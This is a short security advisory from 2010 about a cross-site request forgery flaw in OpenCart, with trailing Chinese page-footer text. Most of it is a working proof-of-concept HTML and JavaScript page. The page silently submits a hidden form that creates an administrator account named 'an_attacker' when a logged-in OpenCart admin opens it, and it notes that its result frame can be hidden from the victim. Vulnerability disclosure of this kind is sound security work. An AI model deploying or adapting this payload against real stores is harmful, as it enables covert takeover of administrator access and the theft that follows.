|
Advisory Information:
Title: OpenCart CSRF Vulnerability
Advisory URL:
http://blog.visionsource.org/2010/01/28/opencart-csrf-vulnerability/
Date published: 2010-01-28
Vendors contacted: OpenCart
Security Risk: High
Vulnerability Description:
OpenCart is vulnerable to CSRF attacks using the POST method. It is possible to craft a malicious page that will create an administrator user when the victim, who is logged into OpenCart, visits the malicious page.
Proofs of Concept:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>OpenCart CSRF Vulnerability</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<script type="text/javascript">
function csrfInjection()
{
var params = {
'username' : 'an_attacker',
'firstname' : 'attack',
'lastname' : 'user',
'email' : 'some.user@randomatackerdomain.com',
'user_group_id' : '1', //Default group id for administrator level is 1
'password' : 'test',
'confirm' : 'test',
'status' : '1'
};
var form = document.createElement("form");
form.setAttribute("method", "post");
form.setAttribute("action", document.getElementById('site_url').value + "/index.php?route=user/user/insert");
for(var key in params) {
var hiddenField = document.createElement("input");
hiddenField.setAttribute("type", "hidden");
hiddenField.setAttribute("name", key);
hiddenField.setAttribute("value", params[key]);
form.appendChild(hiddenField);
}
attack_result.document.body.appendChild(form);
form.submit();
}
</script>
</head>
<body>
OpenCart CSRF Vulnerability
<input type="text" name="site_url" id="site_url" size="50" />/index.php?route=user/user/insert<br />
<a href="#" onclick="csrfInjection();return false;">Add User</a>
<p>Results: (this frame can be hidden so the user never knows the attack was performed)</p>
<iframe id="attack_result" name="attack_result" width="600" height="600"></iframe>
</body>
</html>
|
推荐
评论(0条)
